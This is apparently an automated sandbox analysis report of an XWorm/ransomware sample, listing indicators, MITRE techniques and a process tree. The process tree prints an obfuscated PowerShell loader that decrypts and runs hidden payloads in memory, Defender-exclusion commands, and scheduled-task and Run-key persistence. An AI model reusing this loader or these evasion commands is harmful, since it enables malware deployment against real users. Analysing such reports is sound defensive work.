xworm | ab6fed54d7e8fcd47d2888aae95498968192e13aaab8f8a09880b602ea98e81c

System Information Discovery

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

System User

pid process

940 System User

pid	process
940	System User

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User"	powershell.exe

Drops desktop.ini file(s) 17 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	powershell.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1302416131-1437503476-2806442725-1000\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	powershell.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com

flow	ioc
15	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

RdrCEF.exeRdrCEF.exeRdrCEF.exeAcroRd32.exeRdrCEF.exeRdrCEF.exeRdrCEF.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 13 IoCs

Processes:

OpenWith.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\.ENC\ = "ENC_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ENC_auto_file\shell\Read	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ۈʳ	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ENC_auto_file\shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\.ENC	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\敲d	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\敲d\ = "ENC_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ENC_auto_file	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ۈʳ\ = "ENC_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ENC_auto_file\shell\Read\command	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ENC_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\""	OpenWith.exe

Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3352 schtasks.exe

pid	process
3352	schtasks.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSystem Usermsedge.exemsedge.exeidentity_helper.exe

pid	process
1924	powershell.exe
1924	powershell.exe
5036	powershell.exe
5036	powershell.exe
728	powershell.exe
728	powershell.exe
4452	powershell.exe
4452	powershell.exe
3708	powershell.exe
3708	powershell.exe
4964	powershell.exe
4964	powershell.exe
728	powershell.exe
940	System User
940	System User
3568	msedge.exe
3568	msedge.exe
1156	msedge.exe
1156	msedge.exe
3000	identity_helper.exe
3000	identity_helper.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe
728	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OpenWith.exe

pid process

4044 OpenWith.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid process

1156 msedge.exe
1156 msedge.exe
1156 msedge.exe
1156 msedge.exe
1156 msedge.exe
1156 msedge.exe
1156 msedge.exe
1156 msedge.exe

pid	process
4044	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeIncreaseQuotaPrivilege	5036	powershell.exe
Token: SeSecurityPrivilege	5036	powershell.exe
Token: SeTakeOwnershipPrivilege	5036	powershell.exe
Token: SeLoadDriverPrivilege	5036	powershell.exe
Token: SeSystemProfilePrivilege	5036	powershell.exe
Token: SeSystemtimePrivilege	5036	powershell.exe
Token: SeProfSingleProcessPrivilege	5036	powershell.exe
Token: SeIncBasePriorityPrivilege	5036	powershell.exe
Token: SeCreatePagefilePrivilege	5036	powershell.exe
Token: SeBackupPrivilege	5036	powershell.exe
Token: SeRestorePrivilege	5036	powershell.exe
Token: SeShutdownPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeSystemEnvironmentPrivilege	5036	powershell.exe
Token: SeRemoteShutdownPrivilege	5036	powershell.exe
Token: SeUndockPrivilege	5036	powershell.exe
Token: SeManageVolumePrivilege	5036	powershell.exe
Token: 33	5036	powershell.exe
Token: 34	5036	powershell.exe
Token: 35	5036	powershell.exe
Token: 36	5036	powershell.exe
Token: SeIncreaseQuotaPrivilege	5036	powershell.exe
Token: SeSecurityPrivilege	5036	powershell.exe
Token: SeTakeOwnershipPrivilege	5036	powershell.exe
Token: SeLoadDriverPrivilege	5036	powershell.exe
Token: SeSystemProfilePrivilege	5036	powershell.exe
Token: SeSystemtimePrivilege	5036	powershell.exe
Token: SeProfSingleProcessPrivilege	5036	powershell.exe
Token: SeIncBasePriorityPrivilege	5036	powershell.exe
Token: SeCreatePagefilePrivilege	5036	powershell.exe
Token: SeBackupPrivilege	5036	powershell.exe
Token: SeRestorePrivilege	5036	powershell.exe
Token: SeShutdownPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeSystemEnvironmentPrivilege	5036	powershell.exe
Token: SeRemoteShutdownPrivilege	5036	powershell.exe
Token: SeUndockPrivilege	5036	powershell.exe
Token: SeManageVolumePrivilege	5036	powershell.exe
Token: 33	5036	powershell.exe
Token: 34	5036	powershell.exe
Token: 35	5036	powershell.exe
Token: 36	5036	powershell.exe
Token: SeIncreaseQuotaPrivilege	5036	powershell.exe
Token: SeSecurityPrivilege	5036	powershell.exe
Token: SeTakeOwnershipPrivilege	5036	powershell.exe
Token: SeLoadDriverPrivilege	5036	powershell.exe
Token: SeSystemProfilePrivilege	5036	powershell.exe
Token: SeSystemtimePrivilege	5036	powershell.exe
Token: SeProfSingleProcessPrivilege	5036	powershell.exe
Token: SeIncBasePriorityPrivilege	5036	powershell.exe
Token: SeCreatePagefilePrivilege	5036	powershell.exe
Token: SeBackupPrivilege	5036	powershell.exe
Token: SeRestorePrivilege	5036	powershell.exe
Token: SeShutdownPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeSystemEnvironmentPrivilege	5036	powershell.exe
Token: SeRemoteShutdownPrivilege	5036	powershell.exe
Token: SeUndockPrivilege	5036	powershell.exe
Token: SeManageVolumePrivilege	5036	powershell.exe
Token: 33	5036	powershell.exe
Token: 34	5036	powershell.exe
Token: 35	5036	powershell.exe

Suspicious use of FindShellTrayWindow 34 IoCs

Processes:

msedge.exe

pid	process
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

msedge.exe

pid	process
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe
1156	msedge.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

powershell.exeOpenWith.exeAcroRd32.exe

pid process

728 powershell.exe
4044 OpenWith.exe
4044 OpenWith.exe
4044 OpenWith.exe
3376 AcroRd32.exe
3376 AcroRd32.exe
3376 AcroRd32.exe
3376 AcroRd32.exe

pid	process
728	powershell.exe
4044	OpenWith.exe
4044	OpenWith.exe
4044	OpenWith.exe
3376	AcroRd32.exe
3376	AcroRd32.exe
3376	AcroRd32.exe
3376	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exemsedge.exe

description	pid	process	target process
PID 3176 wrote to memory of 4036	3176	cmd.exe	net.exe
PID 3176 wrote to memory of 4036	3176	cmd.exe	net.exe
PID 4036 wrote to memory of 3936	4036	net.exe	net1.exe
PID 4036 wrote to memory of 3936	4036	net.exe	net1.exe
PID 3176 wrote to memory of 1924	3176	cmd.exe	powershell.exe
PID 3176 wrote to memory of 1924	3176	cmd.exe	powershell.exe
PID 1924 wrote to memory of 5036	1924	powershell.exe	powershell.exe
PID 1924 wrote to memory of 5036	1924	powershell.exe	powershell.exe
PID 1924 wrote to memory of 1412	1924	powershell.exe	WScript.exe
PID 1924 wrote to memory of 1412	1924	powershell.exe	WScript.exe
PID 1412 wrote to memory of 5004	1412	WScript.exe	cmd.exe
PID 1412 wrote to memory of 5004	1412	WScript.exe	cmd.exe
PID 5004 wrote to memory of 2172	5004	cmd.exe	net.exe
PID 5004 wrote to memory of 2172	5004	cmd.exe	net.exe
PID 2172 wrote to memory of 4108	2172	net.exe	net1.exe
PID 2172 wrote to memory of 4108	2172	net.exe	net1.exe
PID 5004 wrote to memory of 728	5004	cmd.exe	powershell.exe
PID 5004 wrote to memory of 728	5004	cmd.exe	powershell.exe
PID 728 wrote to memory of 4452	728	powershell.exe	powershell.exe
PID 728 wrote to memory of 4452	728	powershell.exe	powershell.exe
PID 728 wrote to memory of 4748	728	powershell.exe	powershell.exe
PID 728 wrote to memory of 4748	728	powershell.exe	powershell.exe
PID 728 wrote to memory of 3708	728	powershell.exe	powershell.exe
PID 728 wrote to memory of 3708	728	powershell.exe	powershell.exe
PID 728 wrote to memory of 4964	728	powershell.exe	powershell.exe
PID 728 wrote to memory of 4964	728	powershell.exe	powershell.exe
PID 728 wrote to memory of 3352	728	powershell.exe	schtasks.exe
PID 728 wrote to memory of 3352	728	powershell.exe	schtasks.exe
PID 728 wrote to memory of 1156	728	powershell.exe	msedge.exe
PID 728 wrote to memory of 1156	728	powershell.exe	msedge.exe
PID 1156 wrote to memory of 4932	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 4932	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe
PID 1156 wrote to memory of 3796	1156	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3176
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:3936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_555_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_555.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5036
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_555.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_555.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5004
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2172
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:4108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_555.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_555.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Drops desktop.ini file(s)
        Sets desktop wallpaper using registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:728
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4748
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3708
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4964
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3352
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe86a046f8,0x7ffe86a04708,0x7ffe86a04718
        7⤵
        
        PID:4932
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
        7⤵
        
        PID:3796
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3568
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
